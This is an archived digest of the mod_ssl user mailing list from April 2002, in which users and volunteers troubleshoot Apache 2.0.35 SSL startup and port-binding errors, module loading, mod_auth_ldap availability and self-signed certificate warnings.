www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 15 17:33:26 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA00465; Mon, 15 Apr 2002 17:32:09 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from marvin-lnx.int.tele.dk id RAA00420; Mon, 15 Apr 2002 17:31:20 +0200 (MET DST) Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500) id C316CBD2B; Mon, 15 Apr 2002 17:31:38 +0200 (CEST) Date: Mon, 15 Apr 2002 17:31:38 +0200 From: Mads Toftum To: modssl-users@modssl.org Subject: Re: mod_ssl-2.0.35 + mod_proxy Message-ID: <20020415153138.GC3762@marvin-lnx.int.tele.dk> Mail-Followup-To: modssl-users@modssl.org References: <3CBA93E1.1080007@beamartyr.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3CBA93E1.1080007@beamartyr.net> X-Mailer: mutt Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mads Toftum X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Mon, Apr 15, 2002 at 11:48:33AM +0300, Issac Goldstand wrote: > I've just upgraded my front-end server to Apache > 2.0.35/mod_ssl/openssl-0.9.6b When I try to connect to an https > virtualhost, however, the connection just seems to hang there. Now, the > backend is NOT running mod_ssl (under Apache 1.3, it didn't have to). > Does it have to, now? the engine_log is reporting: You're hitting a bug that has been fixed in the latest cvs - see http://cvs.apache.org/viewcvs.cgi/httpd-2.0/modules/ssl/mod_ssl.c?rev=1.63&content-type=text/vnd.viewcvs-markup vh Mads Toftum -- With a rubber duck, one's never alone. -- "The Hitchhiker's Guide to the Galaxy" ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 15 17:34:42 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA00541; Mon, 15 Apr 2002 17:33:09 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from marvin-lnx.int.tele.dk id RAA00515; Mon, 15 Apr 2002 17:32:48 +0200 (MET DST) Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500) id 719F3BD2B; Mon, 15 Apr 2002 17:33:07 +0200 (CEST) Date: Mon, 15 Apr 2002 17:33:07 +0200 From: Mads Toftum To: modssl-users@modssl.org Subject: Re: Apache 2.0.35 with SSL - wont start Message-ID: <20020415153307.GD3762@marvin-lnx.int.tele.dk> Mail-Followup-To: modssl-users@modssl.org References: <3CBAEF2D.6BBE8BC2@bourse.ch> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3CBAEF2D.6BBE8BC2@bourse.ch> X-Mailer: mutt Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mads Toftum X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Mon, Apr 15, 2002 at 05:18:05PM +0200, Owen Boyle wrote: > What's this about ssl.conf? Are you "including" this file into > httpd.conf at runtime? This is the default for Apache2 - the ssl configuration has been moved out of httpd.conf to ssl.conf vh Mads Toftum -- With a rubber duck, one's never alone. -- "The Hitchhiker's Guide to the Galaxy" ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 15 17:47:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA01255; Mon, 15 Apr 2002 17:46:13 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from darkstar.sysinfo.com id RAA01222; Mon, 15 Apr 2002 17:45:41 +0200 (MET DST) Received: from localhost (dufresne@localhost) by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id KAA02655; Mon, 15 Apr 2002 10:50:34 -0400 Date: Mon, 15 Apr 2002 10:50:34 -0400 (EDT) From: "R. DuFresne" To: paul priestman cc: modssl-users@modssl.org Subject: Re: Apache 2.0.35 with SSL - wont start In-Reply-To: Message-ID: Organization: sysinfo.com X-Subliminal: If at first you don't suck seed... X-Admonition: The Good thing about potential is X-Admonition2: as long as you do nothing X-Admonition3: you'll always have it. MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "R. DuFresne" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users As owen I think mentioned, you might have to cleanup the old httpd.conf file, it might well be trying to setup two connections on thesame port. another suggested here it might be your config, you might not be binding to a specific IP/NIC. Thanks, Ron DuFresne On Mon, 15 Apr 2002, paul priestman wrote: > So its trying to bind to 443 - i have stated in my ssl.conf to listen on > port 8443 and have set up a virtual host for port 8443 with ssl enabled - > how come it tries to bind to port 443? > > I have therefore tried to start the server as root - it started okay but I > cannot make a ssl connection - i goto https://servername.com:443 but get a > server error telling me i could not connect to server - in the error logs i > get: > mod_ssl: Unable to set session id context to 'servername.com:443' (OpenSSL > library error follows) > > OpenSSL: error:140DA111::lib(20) :func(218) :reason(273) > > > > > > > > (13)Permission denied: make_sock: could not bind to address > 0.0.0.0:443 > > > no listening sockets available, shutting down > > > ./apachectl startssl: httpd could not be started > > > > > It's *not* trying to start on 8443 though... > > thanks, > > Ron DuFresne > > On Mon, 15 Apr 2002, paul priestman wrote: > > >i'm actually trying to run this server on port 8443 - the other httpd runs > >on port 443 but i have stopped this server running (as its just another > >test server). I am starting the server as my self - not as root but the > >port is > 1024 anyway > > > >I have tried chaning the port to other numbers aswell but to no luck.... > > > >Paul > > > > >From: "R. DuFresne" > > >To: paul priestman > > >CC: modssl-users@modssl.org > > >Subject: Re: Apache 2.0.35 with SSL - wont start > > >Date: Mon, 15 Apr 2002 09:12:42 -0400 (EDT) > > > > > > > > >You're not trying to run two httpd's on the same set of ports are you, > >the > > >old one running while trying to fire up the new? > > > > > >that's what the error suggests I think... > > > > > >thanks, > > > > > >Ron DuFresne > > > > > >On Mon, 15 Apr 2002, paul priestman wrote: > > > > > > > Hello all, > > > > > > > > I have downloaded and installed Apache 2.0.35 with SSL. I have > > >configured > > > > the httpd.conf as they suggest in ssl.conf. However, when i try to > > >start > > > > apachectl i get the following message: > > > > > > > >From: "R. DuFresne" > >To: paul priestman > >CC: modssl-users@modssl.org > >Subject: Re: Apache 2.0.35 with SSL - wont start > >Date: Mon, 15 Apr 2002 09:12:42 -0400 (EDT) > > > > > >You're not trying to run two httpd's on the same set of ports are you, the > >old one running while trying to fire up the new? > > > >that's what the error suggests I think... > > > >thanks, > > > >Ron DuFresne > > > >On Mon, 15 Apr 2002, paul priestman wrote: > > > > > Hello all, > > > > > > I have downloaded and installed Apache 2.0.35 with SSL. I have > >configured > > > the httpd.conf as they suggest in ssl.conf. However, when i try to > >start > > > apachectl i get the following message: > > > > > > (13)Permission denied: make_sock: could not bind to address 0.0.0.0:443 > > > no listening sockets available, shutting down > > > ./apachectl startssl: httpd could not be started > > > > > > Has anyone any ideas what i'm doing wrong - i have succesfully got ssl > > > working with apache 1.3.22. > > > > > > Thanks for your time > > > > > > Paul > > > > > > _________________________________________________________________ > > > Chat with friends online, try MSN Messenger: http://messenger.msn.com > > > > > > ______________________________________________________________________ > > > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > > > User Support Mailing List modssl-users@modssl.org > > > Automated List Manager majordomo@modssl.org > > > > > > >-- > >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > > admin & senior security consultant: sysinfo.com > > http://sysinfo.com > > > >"Cutting the space budget really restores my faith in humanity. It > >eliminates dreams, goals, and ideals and lets us get straight to the > >business of hate, debauchery, and self-annihilation." > > -- Johnny Hart > > > >testing, only testing, and damn good at it too! > > > > > > > _________________________________________________________________ > Send and receive Hotmail on your mobile device: http://mobile.msn.com > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ admin & senior security consultant: sysinfo.com http://sysinfo.com "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart testing, only testing, and damn good at it too! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 15 18:05:15 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA01980; Mon, 15 Apr 2002 18:04:48 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from irvexch1.rainbow.com id SAA01949; Mon, 15 Apr 2002 18:03:47 +0200 (MET DST) Message-ID: <5606C687D4C7D5119A5800508BF30DB401C04360@mail.rainbow.com> From: Lynn Gazis To: "'modssl-users@modssl.org'" Subject: RE: Apache 2.0.35 with SSL - wont start Date: Mon, 15 Apr 2002 09:06:11 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Lynn Gazis X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I got that as well; I found that, while with Apache 1.3 I only needed to set ServerName in httpd.conf, in Apache 2.0 I needed also to edit both httpd.conf and ssl.conf and change the "0.0.0.0" in both files to my system's real IP address (and, since I didn't care to test as root, change the port numbers to 8080 and 8443). I still haven't figured out why I can connect with IE but get nothing but errors from swamp, though (I can use swamp just fine with Apache 1.3). Lynn Gazis -----Original Message----- From: paul priestman [mailto:primo1980@hotmail.com] Sent: Monday, April 15, 2002 5:59 AM To: modssl-users@modssl.org Subject: Apache 2.0.35 with SSL - wont start Hello all, I have downloaded and installed Apache 2.0.35 with SSL. I have configured the httpd.conf as they suggest in ssl.conf. However, when i try to start apachectl i get the following message: (13)Permission denied: make_sock: could not bind to address 0.0.0.0:443 no listening sockets available, shutting down ./apachectl startssl: httpd could not be started Has anyone any ideas what i'm doing wrong - i have succesfully got ssl working with apache 1.3.22. Thanks for your time Paul _________________________________________________________________ Chat with friends online, try MSN Messenger: http://messenger.msn.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 15 18:20:24 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA03999; Mon, 15 Apr 2002 18:19:22 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ns1.microanswers.net id SAA03980; Mon, 15 Apr 2002 18:18:35 +0200 (MET DST) Received: from ws1 (microanswers.net [63.230.56.77] (may be forged)) by ns1.microanswers.net (8.11.0/8.11.0) with SMTP id g3FG3XR18317; Mon, 15 Apr 2002 11:03:33 -0500 Message-ID: <033001c1e498$ec1beea0$4d38e63f@microanswers.net> From: "Andrew Lietzow" To: , References: <3CBAEF2D.6BBE8BC2@bourse.ch> <20020415153307.GD3762@marvin-lnx.int.tele.dk> Subject: Re: Apache 2.0.35 with SSL - wont start Date: Mon, 15 Apr 2002 11:16:38 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4807.1700 X-MIMEOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Andrew Lietzow" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Dear Mads Toftum, > This is the default for Apache2 - the ssl configuration has been > moved out of httpd.conf to ssl.conf ------- And what a marvelous business/IT decision that was! I applaude this whole-heartedly. I am but a mere mortal, simply needing to know enough to configure, launch, and maintain Apache mod_ssl enabled servers. IMO, this makes for a more straightforward configuration, allowing more users to adopt and utilize the technology. Hopefully, this is perceived to be a good thing by those who enable this project to persist. Andrew Lietzow The ACL Group, Inc. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 15 19:48:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA07349; Mon, 15 Apr 2002 19:47:09 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from darkstar.sysinfo.com id TAA07332; Mon, 15 Apr 2002 19:46:56 +0200 (MET DST) Received: from localhost (dufresne@localhost) by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id MAA03054 for ; Mon, 15 Apr 2002 12:51:55 -0400 Date: Mon, 15 Apr 2002 12:51:55 -0400 (EDT) From: "R. DuFresne" To: modssl-users@modssl.org Subject: Re: Apache 2.0.35 with SSL - wont start In-Reply-To: <033001c1e498$ec1beea0$4d38e63f@microanswers.net> Message-ID: Organization: sysinfo.com X-Subliminal: If at first you don't suck seed... X-Admonition: The Good thing about potential is X-Admonition2: as long as you do nothing X-Admonition3: you'll always have it. MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "R. DuFresne" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Actually, the capability to seperate parts of the configuration has always been in place, it just was not the standard nor the adopted practise in earlier apache releases. In fact, I think seperation of configuration was dropped fairly early on in apache/modssl development as some early web admins found it confusing. Thanks, Ron DuFresne On Mon, 15 Apr 2002, Andrew Lietzow wrote: > Dear Mads Toftum, > > This is the default for Apache2 - the ssl configuration has been > > moved out of httpd.conf to ssl.conf > ------- > And what a marvelous business/IT decision that was! I applaude > this whole-heartedly. > > I am but a mere mortal, simply needing to know enough to > configure, launch, and maintain Apache mod_ssl enabled > servers. > > IMO, this makes for a more straightforward configuration, > allowing more users to adopt and utilize the technology. Hopefully, > this is perceived to be a good thing by those who enable this project > to persist. > > Andrew Lietzow > The ACL Group, Inc. > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ admin & senior security consultant: sysinfo.com http://sysinfo.com "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart testing, only testing, and damn good at it too! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Apr 16 02:58:18 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id CAA25166; Tue, 16 Apr 2002 02:57:46 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mta5-rme.xtra.co.nz id CAA25137; Tue, 16 Apr 2002 02:56:41 +0200 (MET DST) Received: from there ([210.86.52.77]) by mta5-rme.xtra.co.nz with SMTP id <20020416005633.XVSP15116.mta5-rme.xtra.co.nz@there>; Tue, 16 Apr 2002 12:56:33 +1200 Content-Type: text/plain; charset="iso-8859-1" From: Geoff Thorpe To: modssl-users@modssl.org Subject: Re: Apache 2.0.35 with SSL - wont start Date: Tue, 16 Apr 2002 13:57:15 +1200 X-Mailer: KMail [version 1.3.1] References: <5606C687D4C7D5119A5800508BF30DB401C04360@mail.rainbow.com> In-Reply-To: <5606C687D4C7D5119A5800508BF30DB401C04360@mail.rainbow.com> Cc: Lynn Gazis MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: <20020416005633.XVSP15116.mta5-rme.xtra.co.nz@there> Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Geoff Thorpe X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi Lynn, Not having the time to deal with 2.0.** right now, I haven't been keeping an eye on how swamp is finding it. In principle however, swamp's satisfaction with Apache 2.0 should be roughly equivalent to that of "openssl s_client". However, if Apache 2.0 itself doesn't like the "GET /\r/\n\r\n" request string, that might explain a termination or something - but again, you could verify that using s_client. Does s_client handshake OK with it? If all else fails, please contact me off the list and I'll send some ideas about how to trace this. Cheers, Geoff On Tuesday 16 April 2002 04:06, you wrote: > I got that as well; I found that, while with Apache 1.3 I only needed to > set ServerName in httpd.conf, in Apache 2.0 I needed also to edit both > httpd.conf and ssl.conf and change the "0.0.0.0" in both files to my > system's real IP address (and, since I didn't care to test as root, change > the port numbers to 8080 and 8443). > > I still haven't figured out why I can connect with IE but get nothing but > errors from swamp, though (I can use swamp just fine with Apache 1.3). > > Lynn Gazis > > -----Original Message----- > From: paul priestman [mailto:primo1980@hotmail.com] > Sent: Monday, April 15, 2002 5:59 AM > To: modssl-users@modssl.org > Subject: Apache 2.0.35 with SSL - wont start > > > Hello all, > > I have downloaded and installed Apache 2.0.35 with SSL. I have configured > the httpd.conf as they suggest in ssl.conf. However, when i try to start > apachectl i get the following message: > > (13)Permission denied: make_sock: could not bind to address 0.0.0.0:443 > no listening sockets available, shutting down > ./apachectl startssl: httpd could not be started > > Has anyone any ideas what i'm doing wrong - i have succesfully got ssl > working with apache 1.3.22. > > Thanks for your time > > Paul > > _________________________________________________________________ > Chat with friends online, try MSN Messenger: http://messenger.msn.com > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Apr 16 14:26:10 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA26067; Tue, 16 Apr 2002 14:25:48 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from hotmail.com id OAA26013; Tue, 16 Apr 2002 14:25:05 +0200 (MET DST) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Tue, 16 Apr 2002 05:07:55 -0700 Received: from 134.32.101.94 by lw7fd.law7.hotmail.msn.com with HTTP; Tue, 16 Apr 2002 12:07:54 GMT X-Originating-IP: [134.32.101.94] From: "paul priestman" To: modssl-users@modssl.org Subject: mod_auth_ldap with Apache 2.0.35? Date: Tue, 16 Apr 2002 12:07:54 +0000 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 16 Apr 2002 12:07:55.0058 (UTC) FILETIME=[57213920:01C1E53F] Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "paul priestman" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello, Does anyone know if mod_auth_ldap comes with apache 2.0.35 like mod_ssl and mod_dav etc..The documentation seems to suggest so but I can't figure out a way to configure the makefile to install the module at compile time. Does anyone have any suggestions? Paul _________________________________________________________________ Join the world’s largest e-mail service with MSN Hotmail. http://www.hotmail.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Apr 16 17:23:11 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA10071; Tue, 16 Apr 2002 17:22:07 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from smtp1.van.datawave.ca id RAA09851; Tue, 16 Apr 2002 17:20:31 +0200 (MET DST) Received: (qmail 27103 invoked by uid 215); 16 Apr 2002 15:20:20 -0000 Received: from cm@netwonk.ca by smtp1.van.datawave.ca with qmail-scanner-1.01 (. Clean. Processed in 0.023023 secs); 16 Apr 2002 15:20:20 -0000 Received: from unknown (HELO lada.corp.van.dwave) (192.168.100.201) by smtp1.van.datawave.ca with SMTP; 16 Apr 2002 15:20:20 -0000 Received: (qmail 5583 invoked from network); 16 Apr 2002 15:20:19 -0000 Received: from unknown (HELO lovebus) (10.100.0.56) by lada.corp.van.dwave with SMTP; 16 Apr 2002 15:20:19 -0000 From: "Chris MacLean" To: Subject: RE: mod_auth_ldap with Apache 2.0.35? Date: Tue, 16 Apr 2002 08:20:06 -0700 Organization: The Netwonk Syndicate Message-ID: <004f01c1e55a$30c8fc20$3800640a@lovebus> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2616 In-Reply-To: X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Chris MacLean" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users http://httpd.apache.org/docs-2.0/mod/ http://nona.net/software/ldap/ And from http://httpd.apache.org/docs-2.0/upgrading.html "Extensive changes were made to the server API in Apache 2.0. Existing modules designed for the Apache 1.3 API will not work in Apache 2.0 without modification. Details are provided in the developer documentation." I suspect it just has not been modified yet, but I have not tried it. :) Chris -----Original Message----- From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] On Behalf Of paul priestman Sent: Tuesday, April 16, 2002 5:08 AM To: modssl-users@modssl.org Subject: mod_auth_ldap with Apache 2.0.35? Hello, Does anyone know if mod_auth_ldap comes with apache 2.0.35 like mod_ssl and mod_dav etc..The documentation seems to suggest so but I can't figure out a way to configure the makefile to install the module at compile time. Does anyone have any suggestions? Paul _________________________________________________________________ Join the world's largest e-mail service with MSN Hotmail. http://www.hotmail.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 17 09:29:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA08596; Wed, 17 Apr 2002 09:28:19 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id JAA08543; Wed, 17 Apr 2002 09:27:54 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id 420F54CE77A; Tue, 16 Apr 2002 20:37:16 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g3GIauT60411; Tue, 16 Apr 2002 20:36:56 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from localhost id UAA09245; Mon, 15 Apr 2002 20:34:09 +0200 (MET DST) Date: Mon, 15 Apr 2002 20:34:09 +0200 (MET DST) Message-Id: <200204151834.UAA09245@opensource.ee.ethz.ch> From: modssl-bugdb@modssl.org To: modssl-users@modssl.org Subject: Re: [BugDB] can't load x:\apache\mod_ssl.so into server (PR#694) Cc: modssl-bugdb@modssl.org X-Loop: modssl-bugdb@modssl.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: modssl-bugdb@modssl.org X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Full_Name: Daphne Chen Version: 2.8.4 OS: win2K Submission from: (NULL) (12.44.172.142) Receive the following error: C:\WINNT\Profiles\Administrator>apache -D SSL Syntax error on line 203 of d:/apache/conf/httpd.conf: Cannot load d:/apache/modules/mod_ssl.so into server: (126) The specified module could not be found: It seems other people had the same problem. However there is no useful recommand solution besides check the path. Believe me, the path is set. The file is there. Thanks! Daphne ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 17 09:33:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA08967; Wed, 17 Apr 2002 09:32:22 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from omta01.mta.everyone.net id JAA08877; Wed, 17 Apr 2002 09:31:21 +0200 (MET DST) Received: from sitemail.everyone.net (dsnat [216.200.145.62]) by omta01.mta.everyone.net (Postfix) with ESMTP id 4B6931C3F65 for ; Wed, 17 Apr 2002 00:31:20 -0700 (PDT) Received: by sitemail.everyone.net (Postfix, from userid 99) id 06C0F36F9; Wed, 17 Apr 2002 00:31:20 -0700 (PDT) Content-Type: text/plain Content-Disposition: inline Content-Transfer-Encoding: 7bit Mime-Version: 1.0 X-Mailer: MIME-tools 5.41 (Entity 5.404) Date: Wed, 17 Apr 2002 00:31:19 -0700 (PDT) From: Nisarg Rav To: modssl-users@modssl.org Subject: Regarding Certificate Authority X-Originating-Ip: [203.88.129.229] Message-Id: <20020417073120.06C0F36F9@sitemail.everyone.net> Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Nisarg Rav X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users helo gurus, i'm new on this group. Plese guide me to solve my problem regarding openssl. I have successfully installed and configured Apache 1.3.23 + mod_ssl 2.8.7-1.3.23 and openssl-0.9.6b. I also get success in generating Certificate Authority ca.key and ca.crt and on basis on that also able to creat www.virtualhost.cxm.crt properly. even after starting apache these all is responding fine . But in my certificate i'm getting that " This certificate can not be verified upto trusted certification authority. " As i have generated my ouw CA this is obvious but it there any way to remove this or to remove the red cross sign from certificate ? Please guide me .. watiting for reply .. nisarg _____________________________________________________________ Want a new web-based email account ? ---> http://www.firstlinux.net _____________________________________________________________ Run a small business? Then you need professional email like you@yourbiz.com from Everyone.net http://www.everyone.net?tag ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 17 10:42:10 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA13521; Wed, 17 Apr 2002 10:41:24 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from it0033.it-action.com id KAA13457; Wed, 17 Apr 2002 10:40:25 +0200 (MET DST) Received: from itaction.co.uk ([194.106.52.27]) by it0033.it-action.com (Netscape Messaging Server 4.15) with ESMTP id GUPER300.B3R for ; Wed, 17 Apr 2002 09:40:15 +0100 Message-ID: <3CBD34EF.7010508@itaction.co.uk> Date: Wed, 17 Apr 2002 09:40:15 +0100 From: "Peter Viertel" User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:0.9.8) Gecko/20020204 X-Accept-Language: en-us MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Regarding Certificate Authority References: <20020417073120.06C0F36F9@sitemail.everyone.net> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Peter Viertel" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users You have set your mod_ssl up correctly, however your browser is telling you that you did not pay from $100 to $1000 to one of the CA's listed as trusted by the vendor of your BROWSER. To avoid the message, you need to store the certificate for the website in your browser's database of trusted CA's - in IE double click on the padlock - View the certificate, Install button, then explicitly save it to the Trusted Root Certification Authorities. Of course if/when you go public, you will not be able to ask the public to do this - at that point go get the cheapest certificate you can buy that comes from a company listed as trusted by all the browsers out there. I recommend Thawte because they're cheap, and so far, in my experience, have not cut any corners in verifying the legal status of the companies the certificates are for. look in the 'Trusted Root CA's' list on your browser to see all the CA's out there if you want to choose a CA. (I have no affiliation to thawte, other than as a satisfied client). Nisarg Rav wrote: >helo gurus, > >i'm new on this group. Plese guide me to solve my problem regarding openssl. > >I have successfully installed and configured Apache 1.3.23 + mod_ssl 2.8.7-1.3.23 and openssl-0.9.6b. >I also get success in generating Certificate Authority ca.key and ca.crt and on basis on that also able to creat www.virtualhost.cxm.crt properly. >even after starting apache these all is responding fine . > >But in my certificate i'm getting that " This certificate can not be verified upto trusted certification authority. " > >As i have generated my ouw CA this is obvious but it there any way to remove this or to remove the red cross sign from certificate ? > >Please guide me .. > >watiting for reply .. > >nisarg > >_____________________________________________________________ >Want a new web-based email account ? ---> http://www.firstlinux.net > >_____________________________________________________________ >Run a small business? Then you need professional email like you@yourbiz.com from Everyone.net http://www.everyone.net?tag >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User 